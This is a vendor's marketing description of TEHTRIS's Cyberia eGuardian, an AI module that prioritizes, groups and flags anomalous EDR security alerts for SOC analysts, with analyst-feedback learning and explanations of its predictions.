TEHTRIS AI R&D team has developed from scratch an Artificial Intelligence based module called Cyberia eGuardian. The aim of this module is to help, directly from the XDR Platform, SOC analysts to control the IT security and save time. Cyberia eGuardian has a 360° watch coverage, 24/24 – 7/7, on endpoints security events and it performs on them an integral pretreatment, prioritizing, grouping and highlighting security incidents for SOC analysts.
Cyberia eGuardian offers an advanced Deep Learning analysis of TEHTRIS EDR Optimus alerts and events, which aims to be extended to all XDR products in future releases. This analysis consists, on the one hand, in the qualification of each alert and event as “High Priority” or “Low Priority” and as “Anomaly” or not, and, on the other hand, in the grouping of alerts and events by action, over time across the IT infrastructure, and by execution, or unitary process on one machine.
Alerts prioritisation and AI continuous learning
Cyberia eGuardian Artificial Intelligence model is trained to distinguish high priority alerts amongst the mass of low priority alerts and events.
The High or Low priority attribution is based on a AI inferred Priority Score that goes from 0%, for the lowest probability of being a dangerous alert, to 100%, for the highest probability of being dangerous
MSSP strategy with Cyberia eGuardian
Cyberia eGuardian pretreatment and prioritization allows analysts to optimize their time by automatically identifying urgent and important security events to focus on first. TEHTRIS proposes a customizable MSSP strategy consisting of the combination of MITRE based severity qualification and AI based priority score as in the figure below.
MSSP Analysis with Cyberia eGuardian
Priority and Severity complementarity
This strategy allows to pinpoint top priority security events, saving analysts from most of time-consuming, uninteresting and low value rutinary triage tasks. Cyberia eGuardian analysis automatically sorts alerts by priority, reducing the number to be analyzed by the SOC analyst to 0.1%, it’s a significant time-saver for operational security team.
AI personalization and man-in the-loop continuous learning
The Artificial Intelligence base model will adapt to customer specifics and preferences automatically a few days after deployment thanks to inplace neural network continuous learning. This allows the Cyberia eGuardian AI model to evolve and learn with customer’s environment evolutions over time.
Cyberia eGuardian is based on a supervised Deep Neural Network model. This means that it needs labeled data to learn. Alerts are automatically labeled as “High Priority” or “Low Priority” using direct and indirect SOC analysts feedback, in a man-in-the-loop continuous learning approach. This kind of approach grants control to security experts on this AI security tool.
Grouping and Anomaly Detection
It is well known that a great volume of the alerts and events are generated by actions that occur with certain regularity.
Quickly identifying new or rare alerts can become a challenge. In order to address this issue, Cyberia eGuardian enriches and contextualizes every alert and event with Recurrence Insights.
The Recurrence, or number of alerts, generated by the same action, is given, together with the first seen and last seen dates, as well as statistics on the action’s hourly frequency and distribution of the last 24 hours and the list of Endpoints where the action has been seen.
Cyberia eGuardian also offers the automatic grouping of multiple alerts together based on predefined conditions about their associated process. This means that all grouped alerts are generated by the same execution, Cyberia eGuardian gives then a whole view of all the information on the process gathered by multiple EDR modules on time.
Anomaly Detection
Cyberia eGuardian offers an anomaly detection analysis. This anomaly detection is based on the predictions of multiple unsupervised AI models that each vote for the final anomaly prediction. The aim of this feature is to report unusual alerts based on their content. The anomaly detection modela learn everyday in order to keep track of the evolutions of the costumers security events baseline.
Thanks to the information gathered from AI predictions, Cyberia eGuardian can provide an at-risk ranking on machines and users. Each security event is enrichened with machine and user context based on insights from the Cyberia eGuardian anomaly detection models.
AI Explanation and security insights
Ethics and Trust as principles at the heart of TEHTRIS, have inspired R&D teams to develop ethical and transparent AI models. Therefore, Cyberia eGuardian explains its predictions. This explanation highlights the variables of the security event on which the AI algorithm based its choice.
Cyberia eGuardian predictions explanation is which makes it not only an Artificial Intelligence tool but an Augmented Intelligence defense weapon, giving experts information they need to make the final decision.